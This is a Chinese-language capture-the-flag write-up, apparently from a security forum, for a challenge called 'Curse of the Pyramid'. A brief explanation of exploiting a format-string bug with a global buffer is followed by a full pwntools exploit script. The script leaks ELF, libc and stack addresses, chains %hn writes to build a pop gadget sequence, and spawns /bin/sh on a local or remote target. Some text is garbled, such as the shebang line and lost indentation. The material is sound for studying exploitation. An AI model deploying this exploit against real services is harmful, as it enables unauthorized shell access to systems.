-
-
[原创]第三题:金字塔的诅咒
-
2019-6-24 11:48
-
1.思路
看得出来保护全开
进去一看很明显的漏洞格式化漏洞
但是与常规的不同,变量是全局变量。不在栈上,那怎么用呢
百思不得其解,遂问百度,百度答之。
看来是里面一大堆烤肉串,
可以串起来烧。
于是乎,利用烤肉串改了下main的返回地址,再改了下main地址后面的作为参数,
mian地址改为
如果不嫌麻烦可调fk.py试之
#!/usr/bin/env python20482048482048
from pwn import *
import sys
import printf
context.arch = 'i386'
elf_printf_off=0x1FC4
if len(sys.argv) < 2:
p = process('./format')
context.log_level = 'debug'
__libc_start_main_243=0x19AF3
system_off=0x40310
gdb.attach(p,'b *0x56555951\nb *0x5655598E\n')
else:
p = remote(sys.argv[1], int(sys.argv[2]))#gdb.attach(p,'b *0x400cf5 \nb *0x400b62')
__libc_start_main_243=0x18637
system_off=0x3A940
def change(add2):#0x2FFF1FFF
add2_h=add2/0x10000
add2_l=add2%0x10000
print "add2_h is :"+hex(add2_h)
print "add2_l is :"+hex(add2_l)
s1='%.'+str(add2_h)+'x%'+str(55)+'$hn'
s2='%.'+str(add2_l)+'x%'+str(53)+'$hn'
return s1,s2
def inputw(content):
p.recvuntil('Choice:')
p.send('1')
p.recvuntil('What do tou want to say:')
p.send(content)
def write_stack_value2(addr,value):
payload='%.'+str(addr%0x10000)+'x%5$hn'
inputw(payload)
payload='%.'+str(addr%0x10000+2)+'x%56$hn'
inputw(payload)
payload1,payload2=change(value)
inputw(payload1)
inputw(payload2)
def write_stack_value1(addr,value):
payload='%.'+str(addr%0x10000)+'x%5$hn'
inputw(payload)
payload='%.'+str(addr%0x10000+2)+'x%18$hn'
inputw(payload)
payload1,payload2=change(value)
inputw(payload1)
inputw(payload2)
def exp():
payload="%3$x"#%5$x
inputw(payload)
elf_base=int(p.recv(8),16)-0x8f3
log.info("elf_base %x" %(elf_base))
payload="%11$x"#%5$x
inputw(payload)
libc_main_exit=int(p.recv(8),16)
libc_base=libc_main_exit-__libc_start_main_243
log.info("libc_main_exit %x" %(libc_main_exit))
log.info("libc_base %x" %(libc_base))
printf_got=elf_base+elf_printf_off
log.info("printf_got %x" %(printf_got))
payload="%5$x"
inputw(payload)
esp=int(p.recv(8),16)-0xd4
log.info("esp %x" %(esp))
print "write pop"
write_stack_value1(esp+0x3c,elf_base+0x9E8)
print "end pop"
system=elf_base+0x200C+8
edi=0x10001000
ebx=system-edi*4+0xec
write_stack_value1(esp+0xe0,esp+0xdc)#pop ebx
write_stack_value2(esp+0x3c+0x4,ebx)#pop ebx
write_stack_value2(esp+0x3c+0x4*2,0)#pop esi
write_stack_value2(esp+0x3c+0x4*3,edi)#pop edi
write_stack_value2(esp+0x3c+0x4*4,elf_base+0x200C)#pop ebp addr_sh
write_stack_value2(esp+0x3c+0x4*5,elf_base+0x9D3)#call
payload='/bin/sh\x00'+p32(libc_base+system_off)
inputw(payload)
p.send('2')
'''
payload='%.'+str(h_addr_stack%0x10000)+'x%18$hn'
inputw(payload)#for changing any addr
payload1,payload2=change(printf_got)
inputw(payload1)
inputw(payload2)
l_libc_system=(libc_base+system_off)%0x10000
log.info("l_libc_system %x" %(l_libc_system))
payload='%.'+str(l_libc_system)+'x%53$hn'
inputw(payload)
payload='/bin/sh\x00'
p.send(payload)
'''
log.info('get shell!!!')
p.interactive()
if __name__ == '__main__':
exp()
[培训]二进制漏洞攻防(第3期);满10人开班;模糊测试与工具使用二次开发;网络协议漏洞挖掘;Linux内核漏洞挖掘与利用;AOSP漏洞挖掘与利用;代码审计。
|
|
|---|---|
